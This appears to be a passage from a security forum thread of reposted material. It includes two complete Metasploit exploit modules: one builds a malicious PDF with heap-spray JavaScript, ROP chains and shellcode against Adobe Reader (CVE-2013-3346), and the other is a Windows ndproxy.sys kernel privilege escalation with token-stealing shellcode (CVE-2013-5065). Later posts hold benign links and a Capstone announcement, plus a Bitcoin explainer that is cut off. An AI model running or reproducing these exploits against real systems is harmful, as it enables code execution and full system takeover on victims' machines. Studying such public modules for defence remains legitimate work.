module ], 'References' => [ [ 'CVE', '2013-3346' ], [ 'OSVDB', '96745' ], [ 'ZDI', '13-212' ], [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb13-15.html' ], [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html' ] ], 'Platform' => 'win', 'Arch' => ARCH_X86, 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00", 'DisableNops' => true }, 'BrowserRequirements' => { :source => /script|headers/i, :os_name => Msf::OperatingSystems::WINDOWS, :os_flavor => Msf::OperatingSystems::WindowsVersions::XP, :ua_name => Msf::HttpClients::IE }, 'Targets' => [ [ 'Windows XP / IE / Adobe Reader 10/11', { } ], ], 'Privileged' => false, 'DisclosureDate' => "Aug 08 2013", 'DefaultTarget' => 0)) end def on_request_exploit(cli, request, target_info) print_status("request: #{request.uri}") js_data = make_js(cli, target_info) # Create the pdf pdf = make_pdf(js_data) print_status("Sending PDF...") send_response(cli, pdf, { 'Content-Type' => 'application/pdf', 'Pragma' => 'no-cache' }) end def make_js(cli, target_info) # CreateFileMappingA + MapViewOfFile + memcpy rop chain rop_10 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '10' })) rop_11 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '11' })) escaped_payload = Rex::Text.to_unescape(get_payload(cli, target_info)) js = %Q| function heapSpray(str, str_addr, r_addr) { var aaa = unescape("%u0c0c"); aaa += aaa; while ((aaa.length + 24 + 4) < (0x8000 + 0x8000)) aaa += aaa; var i1 = r_addr - 0x24; var bbb = aaa.substring(0, i1 / 2); var sa = str_addr; while (sa.length < (0x0c0c - r_addr)) sa += sa; bbb += sa; bbb += aaa; var i11 = 0x0c0c - 0x24; bbb = bbb.substring(0, i11 / 2); bbb += str; bbb += aaa; var i2 = 0x4000 + 0xc000; var ccc = bbb.substring(0, i2 / 2); while (ccc.length < (0x40000 + 0x40000)) ccc += ccc; var i3 = (0x1020 - 0x08) / 2; var ddd = ccc.substring(0, 0x80000 - i3); var eee = new Array(); for (i = 0; i < 0x1e0 + 0x10; i++) eee[i] = ddd + "s"; return; } var shellcode = unescape("#{escaped_payload}"); var executable = ""; var rop10 = unescape("#{rop_10}"); var rop11 = unescape("#{rop_11}"); var r11 = false; var vulnerable = true; var obj_size; var rop; var ret_addr; var rop_addr; var r_addr; if (app.viewerVersion >= 10 && app.viewerVersion < 11 && app.viewerVersion <= 10.106) { obj_size = 0x360 + 0x1c; rop = rop10; rop_addr = unescape("%u08e4%u0c0c"); r_addr = 0x08e4; ret_addr = unescape("%ua8df%u4a82"); } else if (app.viewerVersion >= 11 && app.viewerVersion <= 11.002) { r11 = true; obj_size = 0x370; rop = rop11; rop_addr = unescape("%u08a8%u0c0c"); r_addr = 0x08a8; ret_addr = unescape("%u8003%u4a84"); } else { vulnerable = false; } if (vulnerable) { var payload = rop + shellcode; heapSpray(payload, ret_addr, r_addr); var part1 = ""; if (!r11) { for (i = 0; i < 0x1c / 2; i++) part1 += unescape("%u4141"); } part1 += rop_addr; var part2 = ""; var part2_len = obj_size - part1.length * 2; for (i = 0; i < part2_len / 2 - 1; i++) part2 += unescape("%u4141"); var arr = new Array(); removeButtonFunc = function () { app.removeToolButton({ cName: "evil" }); for (i = 0; i < 10; i++) arr[i] = part1.concat(part2); } addButtonFunc = function () { app.addToolButton({ cName: "xxx", cExec: "1", cEnable: "removeButtonFunc();" }); } app.addToolButton({ cName: "evil", cExec: "1", cEnable: "addButtonFunc();" }); } | js end def RandomNonASCIIString(count) result = "" count.times do result << (rand(128) + 128).chr end result end def ioDef(id) "%d 0 obj \n" % id end def ioRef(id) "%d 0 R" % id end #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/ def nObfu(str) #return str result = "" str.scan(/./u) do |c| if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z' result << "#%x" % c.unpack("C*")[0] else result << c end end result end def ASCIIHexWhitespaceEncode(str) result = "" whitespace = "" str.each_byte do |b| result << whitespace << "%02x" % b whitespace = " " * (rand(3) + 1) end result << ">" end def make_pdf(js) xref = [] eol = "\n" endobj = "endobj" << eol # Randomize PDF version? pdf = "%PDF-1.5" << eol pdf << "%" << RandomNonASCIIString(4) << eol # catalog xref << pdf.length pdf << ioDef(1) << nObfu("<<") << eol pdf << nObfu("/Pages ") << ioRef(2) << eol pdf << nObfu("/Type /Catalog") << eol pdf << nObfu("/OpenAction ") << ioRef(4) << eol # The AcroForm is required to get icucnv36.dll / icucnv40.dll to load pdf << nObfu("/AcroForm ") << ioRef(6) << eol pdf << nObfu(">>") << eol pdf << endobj # pages array xref << pdf.length pdf << ioDef(2) << nObfu("<<") << eol pdf << nObfu("/Kids [") << ioRef(3) << "]" << eol pdf << nObfu("/Count 1") << eol pdf << nObfu("/Type /Pages") << eol pdf << nObfu(">>") << eol pdf << endobj # page 1 xref << pdf.length pdf << ioDef(3) << nObfu("<<") << eol pdf << nObfu("/Parent ") << ioRef(2) << eol pdf << nObfu("/Type /Page") << eol pdf << nObfu(">>") << eol # end obj dict pdf << endobj # js action xref << pdf.length pdf << ioDef(4) << nObfu("<<") pdf << nObfu("/Type/Action/S/JavaScript/JS ") + ioRef(5) pdf << nObfu(">>") << eol pdf << endobj # js stream xref << pdf.length compressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js)) pdf << ioDef(5) << nObfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol pdf << "stream" << eol pdf << compressed << eol pdf << "endstream" << eol pdf << endobj ### # The following form related data is required to get icucnv36.dll / icucnv40.dll to load ### # form object xref << pdf.length pdf << ioDef(6) pdf << nObfu("<</XFA ") << ioRef(7) << nObfu(">>") << eol pdf << endobj # form stream xfa = <<-EOF <?xml version="1.0" encoding="UTF-8"?> <xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/"> <config xmlns="http://www.xfa.org/schema/xci/2.6/"> <present><pdf><interactive>1</interactive></pdf></present> </config> <template xmlns="http://www.xfa.org/schema/xfa-template/2.6/"> <subform name="form1" layout="tb" locale="en_US"> <pageSet></pageSet> </subform></template></xdp:xdp> EOF xref << pdf.length pdf << ioDef(7) << nObfu("<</Length %s>>" % xfa.length) << eol pdf << "stream" << eol pdf << xfa << eol pdf << "endstream" << eol pdf << endobj ### # end form stuff for icucnv36.dll / icucnv40.dll ### # trailing stuff xrefPosition = pdf.length pdf << "xref" << eol pdf << "0 %d" % (xref.length + 1) << eol pdf << "0000000000 65535 f" << eol xref.each do |index| pdf << "%010d 00000 n" % index << eol end pdf << "trailer" << eol pdf << nObfu("<</Size %d/Root " % (xref.length + 1)) << ioRef(1) << ">>" << eol pdf << "startxref" << eol pdf << xrefPosition.to_s() << eol pdf << "%%EOF" << eol pdf end end =begin * crash Adobe Reader 10.1.4 First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=0c0c08e4 ebx=00000000 ecx=02eb6774 edx=66dd0024 esi=02eb6774 edi=00000001 eip=604d3a4d esp=0012e4fc ebp=0012e51c iopl=0 nv up ei pl nz ac po cy cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010213 AcroRd32_60000000!PDFLTerm+0xbb7cd: 604d3a4d ff9028030000 call dword ptr [eax+328h] ds:0023:0c0c0c0c=???????? * crash Adobe Reader 11.0.2 (940.d70): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.dll - eax=0c0c08a8 ebx=00000001 ecx=02d68090 edx=5b21005b esi=02d68090 edi=00000000 eip=60197b9b esp=0012e3fc ebp=0012e41c iopl=0 nv up ei pl nz ac po cy cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210213 AcroRd32_60000000!DllCanUnloadNow+0x1493ae: 60197b9b ff9064030000 call dword ptr [eax+364h] ds:0023:0c0c0c0c=???????? =end Sursa: http://www.exploit-db.com/exploits/30394/
  14. [h=1]Microsoft Windows ndproxy.sys Local Privilege Escalation[/h] ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Local Rank = AverageRanking include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Process def initialize(info={}) super(update_info(info, { 'Name' => 'Microsoft Windows ndproxy.sys Local Privilege Escalation', 'Description' => %q{ This module exploits a flaw in the ndproxy.sys driver on Windows XP SP3 and Windows 2003 SP2 systems, exploited in the wild in November, 2013. The vulnerability exists while processing an IO Control Code 0x8fff23c8 or 0x8fff23cc, where user provided input is used to access an array unsafely, and the value is used to perform a call, leading to a NULL pointer dereference which is exploitable on both Windows XP and Windows 2003 systems. This module has been tested successfully on Windows XP SP3 and Windows 2003 SP2. In order to work the service "Routing and Remote Access" must be running on the target system. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # Vulnerability discovery 'ryujin', # python PoC 'Shahin Ramezany', # C PoC 'juan vazquez' # MSF module ], 'Arch' => ARCH_X86, 'Platform' => 'win', 'Payload' => { 'Space' => 4096, 'DisableNops' => true }, 'SessionTypes' => [ 'meterpreter' ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Targets' => [ [ 'Automatic', { } ], [ 'Windows XP SP3', { 'HaliQuerySystemInfo' => 0x16bba, # Stable over Windows XP SP3 updates '_KPROCESS' => "\x44", # Offset to _KPROCESS from a _ETHREAD struct '_TOKEN' => "\xc8", # Offset to TOKEN from the _EPROCESS struct '_UPID' => "\x84", # Offset to UniqueProcessId FROM the _EPROCESS struct '_APLINKS' => "\x88" # Offset to ActiveProcessLinks _EPROCESS struct } ], [ 'Windows Server 2003 SP2', { 'HaliQuerySystemInfo' => 0x1fa1e, '_KPROCESS' => "\x38", '_TOKEN' => "\xd8", '_UPID' => "\x94", '_APLINKS' => "\x98" } ] ], 'References' => [ [ 'CVE', '2013-5065' ], [ 'OSVDB' , '100368'], [ 'BID', '63971' ], [ 'EDB', '30014' ], [ 'URL', 'http://labs.portcullis.co.uk/blog/cve-2013-5065-ndproxy-array-indexing-error-unpatched-vulnerability/' ], [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2914486'], [ 'URL', 'https://github.com/ShahinRamezany/Codes/blob/master/CVE-2013-5065/CVE-2013-5065.cpp' ], [ 'URL', 'http://www.secniu.com/blog/?p=53' ], [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html' ], [ 'URL', 'http://blog.spiderlabs.com/2013/12/the-kernel-is-calling-a-zeroday-pointer-cve-2013-5065-ring-ring.html' ] ], 'DisclosureDate'=> 'Nov 27 2013', 'DefaultTarget' => 0 })) end def add_railgun_functions session.railgun.add_function( 'ntdll', 'NtAllocateVirtualMemory', 'DWORD', [ ["DWORD", "ProcessHandle", "in"], ["PBLOB", "BaseAddress", "inout"], ["PDWORD", "ZeroBits", "in"], ["PBLOB", "RegionSize", "inout"], ["DWORD", "AllocationType", "in"], ["DWORD", "Protect", "in"] ]) session.railgun.add_function( 'ntdll', 'NtDeviceIoControlFile', 'DWORD', [ [ "DWORD", "FileHandle", "in" ], [ "DWORD", "Event", "in" ], [ "DWORD", "ApcRoutine", "in" ], [ "DWORD", "ApcContext", "in" ], [ "PDWORD", "IoStatusBlock", "out" ], [ "DWORD", "IoControlCode", "in" ], [ "LPVOID", "InputBuffer", "in" ], [ "DWORD", "InputBufferLength", "in" ], [ "LPVOID", "OutputBuffer", "in" ], [ "DWORD", "OutPutBufferLength", "in" ] ]) session.railgun.add_function( 'ntdll', 'NtQueryIntervalProfile', 'DWORD', [ [ "DWORD", "ProfileSource", "in" ], [ "PDWORD", "Interval", "out" ] ]) session.railgun.add_dll('psapi') unless session.railgun.dlls.keys.include?('psapi') session.railgun.add_function( 'psapi', 'EnumDeviceDrivers', 'BOOL', [ ["PBLOB", "lpImageBase", "out"], ["DWORD", "cb", "in"], ["PDWORD", "lpcbNeeded", "out"] ]) session.railgun.add_function( 'psapi', 'GetDeviceDriverBaseNameA', 'DWORD', [ ["LPVOID", "ImageBase", "in"], ["PBLOB", "lpBaseName", "out"], ["DWORD", "nSize", "in"] ]) end def open_device(dev) invalid_handle_value = 0xFFFFFFFF r = session.railgun.kernel32.CreateFileA(dev, 0x0, 0x0, nil, 0x3, 0, 0) handle = r['return'] if handle == invalid_handle_value return nil end return handle end def find_sys_base(drvname) results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4) addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack("L*") addresses.each do |address| results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48) current_drvname = results['lpBaseName'][0..results['return'] - 1] if drvname == nil if current_drvname.downcase.include?('krnl') return [address, current_drvname] end elsif drvname == results['lpBaseName'][0..results['return'] - 1] return [address, current_drvname] end end return nil end def ring0_shellcode(t) restore_ptrs = "\x31\xc0" # xor eax, eax restore_ptrs << "\xb8" + [ @addresses["HaliQuerySystemInfo"] ].pack("L") # mov eax, offset hal!HaliQuerySystemInformation restore_ptrs << "\xa3" + [ @addresses["halDispatchTable"] + 4 ].pack("L") # mov dword ptr [nt!HalDispatchTable+0x4], eax tokenstealing = "\x52" # push edx # Save edx on the stack tokenstealing << "\x53" # push ebx # Save ebx on the stack tokenstealing << "\x33\xc0" # xor eax, eax # eax = 0 tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00" # mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD tokenstealing << "\x8b\x40" + t['_KPROCESS'] # mov eax, dword ptr [eax+44h] # Retrieve _KPROCESS tokenstealing << "\x8b\xc8" # mov ecx, eax tokenstealing << "\x8b\x98" + t['_TOKEN'] + "\x00\x00\x00" # mov ebx, dword ptr [eax+0C8h] # Retrieves TOKEN tokenstealing << "\x8b\x80" + t['_APLINKS'] + "\x00\x00\x00" # mov eax, dword ptr [eax+88h] <====| # Retrieve FLINK from ActiveProcessLinks tokenstealing << "\x81\xe8" + t['_APLINKS'] + "\x00\x00\x00" # sub eax,88h | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks tokenstealing << "\x81\xb8" + t['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00" # cmp dword ptr [eax+84h], 4 | # Compares UniqueProcessId with 4 (The System Process on Windows XP) tokenstealing << "\x75\xe8" # jne 0000101e ====================== tokenstealing << "\x8b\x90" + t['_TOKEN'] + "\x00\x00\x00" # mov edx,dword ptr [eax+0C8h] # Retrieves TOKEN and stores on EDX tokenstealing << "\x8b\xc1" # mov eax, ecx # Retrieves KPROCESS stored on ECX tokenstealing << "\x89\x90" + t['_TOKEN'] + "\x00\x00\x00" # mov dword ptr [eax+0C8h],edx # Overwrites the TOKEN for the current KPROCESS tokenstealing << "\x5b" # pop ebx # Restores ebx tokenstealing << "\x5a" # pop edx # Restores edx tokenstealing << "\xc2\x10" # ret 10h # Away from the kernel! ring0_shellcode = restore_ptrs + tokenstealing return ring0_shellcode end def fill_memory(proc, address, length, content) result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack("L"), nil, [ length ].pack("L"), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE") unless proc.memory.writable?(address) vprint_error("Failed to allocate memory") return nil end vprint_good("#{address} is now writable") result = proc.memory.write(address, content) if result.nil? vprint_error("Failed to write contents to memory") return nil else vprint_good("Contents successfully written to 0x#{address.to_s(16)}") end return address end def create_proc windir = expand_path("%windir%") cmd = "#{windir}\\System32\\notepad.exe" # run hidden begin proc = session.sys.process.execute(cmd, nil, {'Hidden' => true }) rescue Rex::Post::Meterpreter::RequestError # when running from the Adobe Reader sandbox: # Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Access is denied. return nil end return proc.pid end def disclose_addresses(t) addresses = {} vprint_status("Getting the Kernel module name...") kernel_info = find_sys_base(nil) if kernel_info.nil? vprint_error("Failed to disclose the Kernel module name") return nil end vprint_good("Kernel module found: #{kernel_info[1]}") vprint_status("Getting a Kernel handle...") kernel32_handle = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1) kernel32_handle = kernel32_handle['return'] if kernel32_handle == 0 vprint_error("Failed to get a Kernel handle") return nil end vprint_good("Kernel handle acquired") vprint_status("Disclosing the HalDispatchTable...") hal_dispatch_table = session.railgun.kernel32.GetProcAddress(kernel32_handle, "HalDispatchTable") hal_dispatch_table = hal_dispatch_table['return'] if hal_dispatch_table == 0 vprint_error("Failed to disclose the HalDispatchTable") return nil end hal_dispatch_table -= kernel32_handle hal_dispatch_table += kernel_info[0] addresses["halDispatchTable"] = hal_dispatch_table vprint_good("HalDispatchTable found at 0x#{addresses["halDispatchTable"].to_s(16)}") vprint_status("Getting the hal.dll Base Address...") hal_info = find_sys_base("hal.dll") if hal_info.nil? vprint_error("Failed to disclose hal.dll Base Address") return nil end hal_base = hal_info[0] vprint_good("hal.dll Base Address disclosed at 0x#{hal_base.to_s(16)}") hali_query_system_information = hal_base + t['HaliQuerySystemInfo'] addresses["HaliQuerySystemInfo"] = hali_query_system_information vprint_good("HaliQuerySystemInfo Address disclosed at 0x#{addresses["HaliQuerySystemInfo"].to_s(16)}") return addresses end def check vprint_status("Adding the railgun stuff...") add_railgun_functions if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/ return Exploit::CheckCode::Detected end handle = open_device("\\\\.\\NDProxy") if handle.nil? return Exploit::CheckCode::Safe end session.railgun.kernel32.CloseHandle(handle) os = sysinfo["OS"] case os when /windows xp.*service pack 3/i return Exploit::CheckCode::Appears when /[2003|.net server].*service pack 2/i return Exploit::CheckCode::Appears when /windows xp/i return Exploit::CheckCode::Detected when /[2003|.net server]/i return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe end end def exploit vprint_status("Adding the railgun stuff...") add_railgun_functions if sysinfo["Architecture"] =~ /wow64/i fail_with(Failure::NoTarget, "Running against WOW64 is not supported") elsif sysinfo["Architecture"] =~ /x64/ fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported") end my_target = nil if target.name =~ /Automatic/ print_status("Detecting the target system...") os = sysinfo["OS"] if os =~ /windows xp.*service pack 3/i my_target = targets[1] print_status("Running against #{my_target.name}") elsif ((os =~ /2003/) and (os =~ /service pack 2/i)) my_target = targets[2] print_status("Running against #{my_target.name}") elsif ((os =~ /\.net server/i) and (os =~ /service pack 2/i)) my_target = targets[2] print_status("Running against #{my_target.name}") end else my_target = target end if my_target.nil? fail_with(Failure::NoTarget, "Remote system not detected as target, select the target manually") end print_status("Checking device...") handle = open_device("\\\\.\\NDProxy") if handle.nil? fail_with(Failure::NoTarget, "\\\\.\\NDProxy device not found") else print_good("\\\\.\\NDProxy found!") end print_status("Disclosing the HalDispatchTable and hal!HaliQuerySystemInfo addresses...") @addresses = disclose_addresses(my_target) if @addresses.nil? session.railgun.kernel32.CloseHandle(handle) fail_with(Failure::Unknown, "Filed to disclose necessary addresses for exploitation. Aborting.") else print_good("Addresses successfully disclosed.") end print_status("Storing the kernel stager on memory...") this_proc = session.sys.process.open kernel_shell = ring0_shellcode(my_target) kernel_shell_address = 0x1000 result = fill_memory(this_proc, kernel_shell_address, kernel_shell.length, kernel_shell) if result.nil? session.railgun.kernel32.CloseHandle(handle) fail_with(Failure::Unknown, "Error while storing the kernel stager shellcode on memory") else print_good("Kernel stager successfully stored at 0x#{kernel_shell_address.to_s(16)}") end print_status("Storing the trampoline to the kernel stager on memory...") trampoline = "\x90" * 0x38 # nops trampoline << "\x68" # push opcode trampoline << [0x1000].pack("V") # address to push trampoline << "\xc3" # ret trampoline_addr = 0x1 result = fill_memory(this_proc, trampoline_addr, trampoline.length, trampoline) if result.nil? session.railgun.kernel32.CloseHandle(handle) fail_with(Failure::Unknown, "Error while storing trampoline on memory") else print_good("Trampoline successfully stored at 0x#{trampoline_addr.to_s(16)}") end print_status("Storing the IO Control buffer on memory...") buffer = "\x00" * 1024 buffer[20, 4] = [0x7030125].pack("V") # In order to trigger the vulnerable call buffer[28, 4] = [0x34].pack("V") # In order to trigger the vulnerable call buffer_addr = 0x0d0d0000 result = fill_memory(this_proc, buffer_addr, buffer.length, buffer) if result.nil? session.railgun.kernel32.CloseHandle(handle) fail_with(Failure::Unknown, "Error while storing the IO Control buffer on memory") else print_good("IO Control buffer successfully stored at 0x#{buffer_addr.to_s(16)}") end print_status("Triggering the vulnerability, corrupting the HalDispatchTable...") magic_ioctl = 0x8fff23c8 # Values taken from the exploit in the wild, see references ioctl = session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, magic_ioctl, buffer_addr, buffer.length, buffer_addr, 0x80) session.railgun.kernel32.CloseHandle(handle) print_status("Executing the Kernel Stager throw NtQueryIntervalProfile()...") result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4) print_status("Checking privileges after exploitation...") unless is_system? fail_with(Failure::Unknown, "The exploitation wasn't successful") end p = payload.encoded print_good("Exploitation successful! Creating a new process and launching payload...") new_pid = create_proc if new_pid.nil? print_warning("Unable to create a new process, maybe you're into a sandbox. If the current process has been elevated try to migrate before executing a new process...") return end print_status("Injecting #{p.length.to_s} bytes into #{new_pid} memory and executing it...") if execute_shellcode(p, nil, new_pid) print_good("Enjoy") else fail_with(Failure::Unknown, "Error while executing the payload") end end end Sursa: http://www.exploit-db.com/exploits/30392/
  15. Capstone 1.0 disassembly framework release! From: Nguyen Anh Quynh <aquynh () gmail com> Date: Wed, 18 Dec 2013 12:42:20 +0800 Hi, We are excited to announce the 1.0 version for Capstone, the multi-arch, multi-platform disassembly framework you are longing for! Why this engine is unique? Capstone offers some unparalleled features: - Support all important hardware architectures: ARM, ARM64 (aka ARMv8), Mips & X86. - Clean/simple/lightweight/intuitive architecture-neutral API. - Provide details on disassembled instruction (called “decomposer” by others). - Provide some semantics of the disassembled instruction, such as list of implicit registers read & written. - Implemented in pure C language, with bindings for Python, Ruby, OCaml, C#, Java and GO available. - Native support for Windows & *nix (including MacOSX, Linux, *BSD platforms). - Thread-safe by design. - Distributed under the open source BSD license. For further information, see our website at Capstone - Ultimate disassembly framework Being infant 1.0, Capstone might be still buggy or cannot handle many malware tricks yet. But give it a chance and report your findings, so we can fix the issues in the next versions. Capstone is a very young project: the first line was written just 4 months ago. But we do hope that it will live a long life. The community support is critical for this little open source project! We would like show our gratitude to the beta testers for bug reports & code contributions during the beta phase! Their invaluable helps have been tremendous for us to keep this far. We would like to thank LLVM project, which Capstone is based on. Without the almighty LLVM, Capstone would not be existent! Last but not least, big thanks go to Coseinc for the generous sponsor for our project! Thanks, Quynh Sursa: Full Disclosure: Capstone 1.0 disassembly framework release!
  16. X-Frame-Options: All about Clickjacking? “How else do X-Frame-Options protect my website” A poem by Frederik Braun (Mozilla) and Mario Heiderich (Cure53) The X-Frame-Options header is known to be a good measurement against those so called Clickjacking attacks. You know, this kind of attack where some other website loads important parts of your website inside an Iframe or even frameset, makes everything invisible and overlays attractive looking links and buttons with your invisible website. But - is it really all about Clickjacking? Let us find out about that! I. Introduction II. The Docmode - Problem III. Drag ’ N ’ Drop XSS IV. Copy & Paste XSS V. Invisible Site - Wide XSS VI. Cross - Site Scripting & Length Restrictions VII. JavaScript à la Carte VIII. Frame Busting IX. Side Channels & Cross - Origin Leaks X. Bye bye , CSP XI. Conclusion Download: https://frederik-braun.com/xfo-clickjacking.pdf
  17. An Introduction to the Theory of Elliptic Curves Joseph H. Silverman Brown University and NTRU Cryptosystems, Inc. Summer School on Computational Number Theory and Applications to Cryptography University of Wyoming June 19 { July 7, 2006 Download: http://www.math.brown.edu/~jhs/Presentations/WyomingEllipticCurve.pdf
  18. Nytro

    Obfuscate C

    Arta! char*lie; double time, me= !0XFACE, not; int rested, get, out; main(ly, die) char ly, **die ;{ signed char lotte, dear; (char)lotte--; for(get= !me;; not){ 1 - out & out ;lie;{ char lotte, my= dear, **let= !!me *!not+ ++die; (char*)(lie= "The gloves are OFF this time, I detest you, snot\n\0sed GEEK!"); do {not= *lie++ & 0xF00L* !me; #define love (char*)lie - love 1 *!(not= atoi(let [get -me? (char)lotte- (char)lotte: my- *love - 'I' - *love - 'U' - 'I' - (long) - 4 - 'U' ])- !! (time =out= 'a'));} while( my - dear && 'I'-1l -get- 'a'); break;}} (char)*lie++; (char)*lie++, (char)*lie++; hell:0, (char)*lie; get *out* (short)ly -0-'R'- get- 'a'^rested; do {auto*eroticism, that; puts(*( out - 'c' -('P'-'S') +die+ -2 ));}while(!"you're at it"); for (*((char*)&lotte)^= (char)lotte; (love ly) [(char)++lotte+ !!0xBABE]{ if ('I' -lie[ 2 +(char)lotte]){ 'I'-1l ***die; } else{ if ('I' * get *out* ('I'-1l **die[ 2 ])) *((char*)&lotte) -= '4' - ('I'-1l); not; for(get=! get; !out; (char)*lie & 0xD0- !not) return!! (char)lotte;} (char)lotte; do{ not* putchar(lie [out *!not* !!me +(char)lotte]); not; for(;!'a';}while( love (char*)lie);{ register this; switch( (char)lie [(char)lotte] -1 *!out) { char*les, get= 0xFF, my; case' ': *((char*)&lotte) += 15; !not +(char)*lie*'s'; this +1+ not; default: 0xF +(char*)lie;}}} get - !out; if (not--) goto hell; exit( (char)lotte);} https://www.cise.ufl.edu/~manuel/obfuscate/
  19. Win64? Trebuie sa fie semnate sau dezactivezi PatchGuard.
  20. How the Bitcoin protocol actually works by Michael Nielsen on December 6, 2013 Many thousands of articles have been written purporting to explain Bitcoin, the online, peer-to-peer currency. Most of those articles give a hand-wavy account of the underlying cryptographic protocol, omitting many details. Even those articles which delve deeper often gloss over crucial points. My aim in this post is to explain the major ideas behind the Bitcoin protocol in a clear, easily comprehensible way. We’ll start from first principles, build up to a broad theoretical understanding of how the protocol works, and then dig down into the nitty-gritty, examining the raw data in a Bitcoin transaction. Understanding the protocol in this detailed way is hard work. It is tempting instead to take Bitcoin as given, and to engage in speculation about how to get rich with Bitcoin, whether Bitcoin is a bubble, whether Bitcoin might one day mean the end of taxation, and so on. That’s fun, but severely limits your understanding. Understanding the details of the Bitcoin protocol opens up otherwise inaccessible vistas. In particular, it’s the basis for understanding Bitcoin’s built-in scripting language, which makes it possible to use Bitcoin to create new types of financial instruments, such as smart contracts. New financial instruments can, in turn, be used to create new markets and to enable new forms of collective human behaviour. Talk about fun! I’ll describe Bitcoin scripting and concepts such as smart contracts in future posts. This post concentrates on explaining the nuts-and-bolts of the Bitcoin protocol. To understand the post, you need to be comfortable with public key cryptography, and with the closely related idea of digital signatures. I’ll also assume you’re familiar with cryptographic hashing. None of this is especially difficult. The basic ideas can be taught in freshman university mathematics or computer science classes. The ideas are beautiful, so if you’re not familiar with them, I recommend taking a few hours to get familiar. It may seem surprising that Bitcoin’s basis is cryptography. Isn’t Bitcoin a currency, not a way of sending secret messages? In fact, the problems Bitcoin needs to solve are largely about securing transactions — making sure people can’t steal from one another, or impersonate one another, and so on. In the world of atoms we achieve security with devices such as locks, safes, signatures, and bank vaults. In the world of bits we achieve this kind of security with cryptography. And that’s why Bitcoin is at heart a cryptographic protocol. My strategy in the post is to build Bitcoin up in stages. I’ll begin by explaining a very simple digital currency, based on ideas that are almost obvious. We’ll call that currency Infocoin, to distinguish it from Bitcoin. Of course, our first version of Infocoin will have many deficiencies, and so we’ll go through several iterations of Infocoin, with each iteration introducing just one or two simple new ideas. After several such iterations, we’ll arrive at the full Bitcoin protocol. We will have reinvented Bitcoin! This strategy is slower than if I explained the entire Bitcoin protocol in one shot. But while you can understand the mechanics of Bitcoin through such a one-shot explanation, it would be difficult to understand why Bitcoin is designed the way it is. The advantage of the slower iterative explanation is that it gives us a much sharper understanding of each element of Bitcoin. Finally, I should mention that I’m a relative newcomer to Bitcoin. I’ve been following it loosely since 2011 (and cryptocurrencies since the late 1990s), but only got seriously into the details of the Bitcoin protocol earlier this year. So I’d certainly appreciate corrections of any misapprehensions on my part. Also in the post I’ve included a number of “problems for the author” – notes to myself about questions that came up during the writing. You may find these interesting, but you can also skip them entirely without losing track of the main text. First steps: a signed letter of intent So how can we design a digital currency? On the face of it, a digital currency sounds impossible. Suppose some person – let’s call her Alice – has some digital money which she wants to spend. If Alice can use a string of bits as money, how can we prevent her from using the same bit string over and over, thus minting an infinite supply of money? Or, if we can somehow solve that problem, how can we prevent someone else forging such a string of bits, and using that to steal from Alice? These are just two of the many problems that must be overcome in order to use information as money. As a first version of Infocoin, let’s find a way that Alice can use a string of bits as a (very primitive and incomplete) form of money, in a way that gives her at least some protection against forgery. Suppose Alice wants to give another person, Bob, an infocoin. To do this, Alice writes down the message “I, Alice, am giving Bob one infocoin”. She then digitally signs the message using a private cryptographic key, and announces the signed string of bits to the entire world. (By the way, I’m using capitalized “Infocoin” to refer to the protocol and general concept, and lowercase “infocoin” to refer to specific denominations of the currency. A similar useage is common, though not universal, in the Bitcoin world.) This isn’t terribly impressive as a prototype digital currency! But it does have some virtues. Anyone in the world (including Bob) can use Alice’s public key to verify that Alice really was the person who signed the message “I, Alice, am giving Bob one infocoin”. No-one else could have created that bit string, and so Alice can’t turn around and say “No, I didn’t mean to give Bob an infocoin”. So the protocol establishes that Alice truly intends to give Bob one infocoin. The same fact – no-one else could compose such a signed message – also gives Alice some limited protection from forgery. Of course, after Alice has published her message it’s possible for other people to duplicate the message, so in that sense forgery is possible. But it’s not possible from scratch. These two properties – establishment of intent on Alice’s part, and the limited protection from forgery – are genuinely notable features of this protocol. I haven’t (quite) said exactly what digital money is in this protocol. To make this explicit: it’s just the message 